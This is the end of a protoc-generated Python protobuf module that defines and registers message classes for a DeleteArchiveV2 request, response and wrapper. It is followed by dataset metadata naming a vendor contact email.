name='data', full_name='archive.DeleteArchiveV2ResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=229,
serialized_end=359,
)
_DELETEARCHIVEV2RESPONSEWRAPPER.fields_by_name['data'].message_type = _DELETEARCHIVEV2RESPONSE
DESCRIPTOR.message_types_by_name['DeleteArchiveV2Request'] = _DELETEARCHIVEV2REQUEST
DESCRIPTOR.message_types_by_name['DeleteArchiveV2Response'] = _DELETEARCHIVEV2RESPONSE
DESCRIPTOR.message_types_by_name['DeleteArchiveV2ResponseWrapper'] = _DELETEARCHIVEV2RESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DeleteArchiveV2Request = _reflection.GeneratedProtocolMessageType('DeleteArchiveV2Request', (_message.Message,), {
'DESCRIPTOR' : _DELETEARCHIVEV2REQUEST,
'__module__' : 'delete_archive_v2_pb2'
# @@protoc_insertion_point(class_scope:archive.DeleteArchiveV2Request)
})
_sym_db.RegisterMessage(DeleteArchiveV2Request)
DeleteArchiveV2Response = _reflection.GeneratedProtocolMessageType('DeleteArchiveV2Response', (_message.Message,), {
'DESCRIPTOR' : _DELETEARCHIVEV2RESPONSE,
'__module__' : 'delete_archive_v2_pb2'
# @@protoc_insertion_point(class_scope:archive.DeleteArchiveV2Response)
})
_sym_db.RegisterMessage(DeleteArchiveV2Response)
DeleteArchiveV2ResponseWrapper = _reflection.GeneratedProtocolMessageType('DeleteArchiveV2ResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _DELETEARCHIVEV2RESPONSEWRAPPER,
'__module__' : 'delete_archive_v2_pb2'
# @@protoc_insertion_point(class_scope:archive.DeleteArchiveV2ResponseWrapper)
})
_sym_db.RegisterMessage(DeleteArchiveV2ResponseWrapper)
# @@protoc_insertion_point(module_scope)
|
[
"service@easyops.cn"
] |
service@easyops.cn
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.